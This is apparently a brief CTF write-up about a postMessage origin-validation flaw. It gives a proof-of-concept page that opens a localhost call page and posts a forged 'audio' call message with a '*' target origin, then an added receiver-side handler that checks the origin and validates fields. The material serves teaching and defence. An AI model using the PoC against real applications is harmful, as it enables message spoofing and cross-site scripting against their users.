Tags: xss web 

There is no origin validation for window postMessage messages.
```
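<html>
<script type="text/javascript">
  // Open the page that listens for messages and keep a handle to its window.
  var call_window;
  call_window = window.open("http://localhost/call.php");

  // Give the page a second to load, then post a call notification to it.
  // The "*" targetOrigin places no restriction on the recipient's origin.
  setTimeout(function () {
    call_window.postMessage({
      type: "audio",
      details: {
        sender_username: "",
        sender_team_name: "zzzz",
        receiver_username: "test",
        receiver_team_name: "test"
      }
    }, "*");
  }, 1000);
</script>
</html>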
```
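
The missing check on the receiving side, as an added example that is not part of the original writeup or the challenge's code: a `message` handler that checks `event.origin` against an allowlist and then validates the payload. The field names come from the proof of concept above; the trusted origin, the name format and the `caller` element id are assumptions.

```javascript
// Added example: receiver-side checks for the message shape used in the PoC.
// TRUSTED_ORIGINS, NAME_RE and the "caller" element id are assumptions.
const TRUSTED_ORIGINS = new Set(["http://localhost"]);
const NAME_RE = /^[A-Za-z0-9_-]{1,32}$/;
const FIELDS = ["sender_username", "sender_team_name",
                "receiver_username", "receiver_team_name"];

// Returns a cleaned copy of the message, or null when it must be dropped.
function acceptCallMessage(event, trusted = TRUSTED_ORIGINS) {
  // event.origin is filled in by the browser; the sending page cannot forge it.
  if (!trusted.has(event.origin)) return null;

  // A trusted origin is necessary, not sufficient: validate the payload too.
  const msg = event.data;
  if (msg === null || typeof msg !== "object") return null;
  if (msg.type !== "audio") return null; // only type shown in the PoC
  const details = msg.details;
  if (details === null || typeof details !== "object") return null;

  const clean = {};
  for (const field of FIELDS) {
    const value = details[field];
    if (typeof value !== "string" || !NAME_RE.test(value)) return null;
    clean[field] = value;
  }
  return { type: msg.type, details: clean };
}

// Browser wiring (skipped when run under Node).
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    const call = acceptCallMessage(event);
    if (call === null) return;
    // textContent never parses the value as HTML.
    document.getElementById("caller").textContent =
      call.details.sender_username;
  });
}
```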